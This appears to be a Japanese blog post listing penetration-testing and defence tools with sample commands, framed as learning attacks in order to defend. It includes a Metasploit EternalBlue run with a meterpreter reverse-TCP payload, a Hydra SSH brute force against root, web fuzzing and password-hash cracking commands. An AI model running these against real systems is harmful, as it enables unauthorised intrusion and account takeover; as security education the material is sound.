1. ポート・ネットワークスキャン系
Nmap:標準。ポート・サービス検出・OS推定まで。
# 単純なポートスキャン
nmap 192.168.1.10
# 開いているポートとサービスを詳細にスキャン
nmap -sV -O 192.168.1.10
# 複数ホストをスキャン
nmap -sV 192.168.1.1-254
RustScan:Nmapより速くスキャンして、その結果をNmapに渡せる。
# 1-65535ポートを高速スキャンしてNmapで詳細情報を取得
rustscan -a 192.168.1.10 --ulimit 5000 -- -A
Masscan:超高速、インターネット全体もスキャン可能。
→ イメージ:攻撃者はまず「どこに何が開いてるか」を確認。# 80番ポートをスキャン
masscan 192.168.0.0/16 -p80 --rate=1000
2. 脆弱性検索・Exploit系
Metasploit:ペイロード作成・攻撃実行・脆弱性検証。
# 80番ポートをスキャン
msfconsole
# 使用するモジュール選択
use exploit/windows/smb/ms17_010_eternalblue
# ターゲット設定
set RHOST 192.168.1.10
set RPORT 445
# ペイロード設定
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
run
SearchSploit:Exploit-DB検索。ローカルでオフライン利用可能。
# "Apache Struts" の脆弱性検索
searchsploit Apache Struts
# ローカルコピーを利用
searchsploit -m exploits/linux/remote/12345.py
ExploitDB / PacketStorm:公開されている攻撃コード・情報サイト。
→ ポイント:攻撃方法を知り、防御策に活かす。
3. ウェブアプリ列挙・総当たり系
Gobuster:ディレクトリ・ファイル・サブドメイン列挙。
# ディレクトリ列挙
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt
# サブドメイン列挙
gobuster dns -d example.com -w subdomains.txt
Dirb / Dirbuster:古典的ディレクトリ総当たり。
dirb http://example.com /usr/share/wordlists/dirb/common.txt
WFuzz:フォームやパラメータへのブルートフォース。
→ ポイント:攻撃者が「隠しページや管理画面」を探す手順。# ユーザーIDパラメータをブルートフォース
wfuzz -c -z file,usernames.txt --hc 404 http://example.com/login?user=FUZZ
4. パスワード攻撃・認証突破系
Hydra:多プロトコル対応。ログインブルートフォース。
# SSHログイン試行
hydra -l root -P passwords.txt ssh://192.168.1.10
John the Ripper:ハッシュ解析、パスワード強度チェック。
# ハッシュファイル解析
john --wordlist=rockyou.txt hash.txt
Hashcat:GPU対応で超高速ハッシュ解析。
→ ポイント:パスワードの弱さがどれだけ危険か体感できる。hashcat -m 0 -a 0 hash.txt rockyou.txt
5. 監視・検知系(防御を学ぶため)
Snort / Suricata:IDS/IPS。リアルタイムで攻撃検知。
# Snortでパケット監視
snort -A console -c /etc/snort/snort.conf -i eth0
OSSEC / Wazuh:ログ監視・侵入検知。
# ログ監視設定(例)
ossec-control start
fail2ban:ログ解析して自動ブロック。
→ ポイント:攻撃手法を知ることで、防御策がより現実的になる。# SSHログイン失敗でIPをブロック
sudo fail2ban-client status sshd
まとめ
攻撃系ツールは「脆弱性理解」と「防御策の検証」に役立つ。
防御系ツールは「攻撃を知ることでより実践的な対策が取れる」
0 件のコメント:
コメントを投稿